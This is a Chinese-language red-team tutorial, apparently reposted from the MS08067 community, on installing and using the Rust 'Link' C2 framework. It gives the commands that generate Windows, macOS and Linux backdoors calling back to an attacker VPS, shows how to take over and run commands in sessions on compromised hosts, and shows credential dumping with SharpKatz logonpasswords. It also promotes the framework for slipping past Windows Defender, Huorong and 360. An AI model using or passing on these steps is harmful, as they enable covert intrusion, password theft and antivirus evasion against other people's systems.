文章来源|MS08067 内网攻防知识星球
本文作者:清风(Ms08067内网小组核心成员)
⼀、⼯具简介
在翻看公众号的时候发现有⼤佬简单介绍了下这款⼯具,⽹上的教程⼏乎没有,简单研究了下。
Link :rust 语⾔开发的 c2 框架,因为开发语⾔⼩众,所以⽬前国内所有杀软都可过包括WindowsDefender。
功能虽然没有MSF和CobaltStrike成熟,但还是很强⼤的,⾜够实现红队渗透测试⼯作,当CS/MSF特征⽆法绕过的时候,可以尝试使⽤这个⼯具
项⽬地址:
https://github.com/postrequest/link
⼆、安装 不知道是什么原因,国外的vps安装后都⽆法⽣成载荷,暂时未能解决,最后⽤国内vps实验成功的 安装过程较为简单 :
代码语言:javascript复制$ git clone https://github.com/postrequest/link
$ cd link/
$ ./kali-install.sh
执⾏后 会出现这个⻚⾯后,三个选项分别是: 1、继续安装(默认安装) 2、⾃定义安装 3、取消安装
这⾥选择 1 默认安装即可 安装过程较为漫⻓,需要等待下⾯进度条结束:
结束后后直接重启,因为 rust 安装完后需要重启⽣效 :
重启后,再次进⼊到/link⽂件夹下,运⾏启动命令:
代码语言:javascript复制./target/release/link //不建议进⼊/target/release/⽬录再执⾏link,那样会让你指定
证书位置
启动后,会让你设置⼀个监听端⼝,这个端⼝也是后续shellcode中的端⼝ :
然后进⼊到link的管理模式下,
主要⽤到前三条: 在 Windows, MacOS , Linux 中⽣成载荷:
代码语言:javascript复制generate vps-ip:port #⽣成 windows 后⻔
generate-osx vps-ip:port #⽣成 苹果 载荷
generate-linux vps-ip:port #⽣成 linux 载荷
Windows 上线: ⽣成Windows后⻔(过程相当漫⻓,请耐⼼等待):
代码语言:javascript复制generate vps-ip:9080
运⾏link.exe 后上线: 查看当前会话:links ,类似MSF的Sessions
进⼊到当前会话 links -i 会话ID : 进⼊到当前会话中后 可以执⾏命令 whoami
抓取密码: 这个模块需要安装 SharpCollection ⼯具,不然会报错,提示你安装
安装完后再次执⾏:
代码语言:javascript复制sharp //可罗列出所有的tools
功能很多,这⾥只介绍SharpKatz模块
SharpKatz 参数介绍:
https://github.com/b4rtik/SharpKatz
代码语言:javascript复制sharp svchost SharpKatz --Command logonpasswords //抓取密码
还有很多功能,后续待补充。
Linux上线: ⽣成后⻔:
然后上传到⽬标运⾏ ,成功上线,然后就是Linux上线后的操作:
执⾏命令:
代码语言:javascript复制shell linux命令
未完待续。。。
ByPass ⽅⾯: 通过测试发现:Windows Defender、⽕绒、 360 动态、静态都可过